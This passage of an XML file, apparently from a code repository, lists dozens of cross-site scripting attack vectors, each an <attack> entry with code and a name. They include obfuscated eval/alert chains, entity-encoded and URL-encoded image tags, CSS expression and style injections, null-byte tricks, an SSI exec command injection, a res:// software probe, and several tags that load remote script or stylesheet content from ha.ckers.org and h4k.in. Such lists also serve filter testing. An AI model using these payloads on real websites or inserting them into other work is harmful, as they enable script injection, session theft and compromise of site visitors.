<code>&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Non-Alpha/Non-Digit</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;BODY onload!#$%&amp;()*~+-_.###:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;</code>
<name>Non-Alpha/Non-Digit Part 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;/noscript&gt;
&lt;code onmouseover=a=eval;b=alert;a(b(/h/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<name>Noscript-breaker with mouseover</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>perl -e 'print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)&gt;&quot;;'&gt; out</code>
<name>Null Chars 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>perl -e 'print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;' &gt; out</code>
<name>Null Chars 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body onload=;;;;;;;;;;;_=alert;_(1);;;;</code>
<name>Obfuscated body onload vector</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=
0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=
0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=pa
rentNode;x.appendChild(i);</code>
<name>Obfuscated DOM element creation</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body &lt;body onload=;;;;;al:eval('al'+'ert(1)');;&gt;</code>
<name>Obfuscated double-body onload vector</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMGSRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;&lt;WBR&gt;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;&lt;WBR&gt;#116;&amp;#58;&amp;#97;
&amp;#108;&amp;#101;&amp;&lt;WBR&gt;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83&lt;WBR&gt;;&amp;#83;&amp;#39;&amp;#41&gt;</code>
<name>Obfuscated image tag using dec entities</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMGSRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28
&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;</code>
<name>Obfuscated image tag using hex entities</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMGSRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058
&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;</code>
<name>Obfuscated image tag using long dec entities</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;</code>
<name>Obfuscated JS image source</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>(1?(1?{a:1?&quot;&quot;[1?&quot;ev\a\l&quot;:0](1?&quot;\a\lert&quot;:0):0}:0).a:0)[1?&quot;\c\a\l\l&quot;:0](content,1?&quot;x\s\s&quot;:0)</code>
<name>Obfuscated name trigger for Firefox</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body/s/onload=x={doc:parent.document};x.doc.writeln(1)</code>
<name>Obfuscated onload attribute variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body/””$/onload=x={doc:parent['document']};x.doc.writeln(1)</code>
<name>Obfuscated onload attribute variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;body/""$/onload=x={doc:parent['document']};x.doc.writeln(1)</code>
<name>Obfuscated onload attribute variant 3</name>
<desc>(ah: added 05-dec-11)</desc>
<label></label>
</attack>
<attack>
<code>123[''+&lt;_&gt;ev&lt;/_&gt;+&lt;_&gt;al&lt;/_&gt;](''+&lt;_&gt;aler&lt;/_&gt;+&lt;_&gt;t&lt;/_&gt;+&lt;_&gt;(1)&lt;/_&gt;);</code>
<name>Obfuscated XML predicate vector variation 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=&lt;s&gt;evalalerta(1)a&lt;/s&gt;,s2=&lt;s&gt;&lt;/s&gt;+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:
0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/
s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/
s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:
0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:
0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)</code>
<name>Obfuscated XML predicate vector variation 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>o={x:''+&lt;s&gt;eva&lt;/s&gt;+&lt;s&gt;l&lt;/s&gt;,y:''+&lt;s&gt;aler&lt;/s&gt;+&lt;s&gt;t&lt;/s&gt;+&lt;s&gt;(1)&lt;/
s&gt;};function f() { 0[this.x](this.y) }f.call(o);</code>
<name>Obfuscated XML predicate vector variation 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___)</code>
<name>Obfuscated XSS variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;</code>
<name>OBJECT</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;</code>
<name>OBJECT w/Embedded XSS</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert('XSS');&quot;)&quot;;eval(a+b+c+d);</code>
<name>OBJECT w/Flash 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Octal Encoding</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>open(name)</code>
<name>Open string contained in name property</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;'); ?&gt;</code>
<name>PHP</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>alert(1)</code>
<name>Plain JavaScript alert</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Protocol Resolution Bypass</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;</code>
<name>Protocol resolution in script tags</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>0%0d%0a%00&lt;script src=//h4k.in&gt;</code>
<name>RegExp based, and native C filter vector.</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)
'+'';
u1=s1+s2+s3;URL=u1</code>
<name>Remote IE URL overloading</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;</code>
<name>Remote Stylesheet 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;</code>
<name>Remote Stylesheet 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;</code>
<name>Remote Stylesheet 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;</code>
<name>Remote Stylesheet 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;</code>
<name>Removing Cnames</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;</code>
<name>Rename .js to .jpg</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210</code>
<name>res:// installed software probing</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;</code>
<name>SCRIPT w/Alert()</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</code>
<name>SCRIPT w/Char Code</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;</code>
<name>SCRIPT w/Source File</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1))</code>
<name>Self-contained XSS variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))</code>
<name>Self-contained XSS variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>eval.call(this,unescape.call(this,location))</code>
<name>Self-contained XSS variant 3</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b)))</code>
<name>Self-contained XSS variant 4</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a</code>
<name>Self-contained XSS variant 5</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>_=eval,__=unescape,___=document.URL,_(__(___))</code>
<name>Self-contained XSS variant 6</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)</code>
<name>Self-contained XSS variant 7</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))</code>
<name>Self-contained XSS variant 8</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod)</code>
<name>Self-contained XSS variant 9</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>with(location)with(hash)eval(substring(1))</code>
<name>Self-containing XSS with no dots</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG SRC=&quot; &amp;#14; javascript:alert('XSS');&quot;&gt;</code>
<name>Spaces/Meta Chars</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;!--#exec cmd=&quot;/bin/echo '&lt;SCRIPT SRC'&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo '=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'&quot;--&gt;</code>
<name>SSI</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert('XSS');&lt;/STYLE&gt;</code>
<name>STYLE</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;style&gt;
body:after{
content: “\61\6c\65\72\74\28\31\29″
}
&lt;/style&gt;
&lt;script&gt;
eval(eval(document.styleSheets[0].cssRules[0].style.content))
&lt;/script&gt;</code>
<name>Style injection via content and double-eval</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;XSS STYLE=&quot;xss:expression(alert('XSS'))&quot;&gt;</code>
<name>STYLE w/Anonymous HTML</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert('XSS')&quot;)}&lt;/STYLE&gt;</code>
<name>STYLE w/background</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert('XSS')&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</code>
<name>STYLE w/background-image</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(&quot;XSS&quot;)';&lt;/STYLE&gt;</code>
<name>STYLE w/broken up JavaScript</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert('XSS'))&quot;&gt;</code>
<name>STYLE w/Comment</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert('XSS');&quot;&gt;</code>
<name>Stylesheet</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>}&lt;/style&gt;&lt;script&gt;a=eval;b=alert;a(b(/i/.source));&lt;/script&gt;</code>
<name>Style-breaker using obfuscated JavaScript</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&gt;&quot;'</code>
<name>Super basic HTML breaker 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>a=alert
a(0)</code>
<name>Super short XSS variant 1</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>A=alert;A(1)</code>
<name>Super short XSS variant 2</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;TABLE BACKGROUND=&quot;javascript:alert('XSS')&quot;&gt;&lt;/TABLE&gt;</code>
<name>TABLE</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert('XSS')&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;</code>
<name>TD</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&lt;/textarea&gt;
&lt;code onmouseover=a=eval;b=alert;a(b(/g/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<name>Textarea-breaker with mouseover</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'</code>
<name>Unicode encoded script tags</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>http://aa&quot;&gt;&lt;script&gt;alert(123)&lt;/script&gt;</code>
<name>URL breaker for double quotes</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>http://aa'&gt;&lt;script&gt;alert(123)&lt;/script&gt;</code>
<name>URL breaker for single quotes</name>
<desc></desc>
<label></label>
</attack>
<attack>
<code>&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;</code>
<name>URL encoded image source</name>
<desc></desc>
<label></label>
</attack>
</xss>
Reference in a new issue View git blame Copy permalink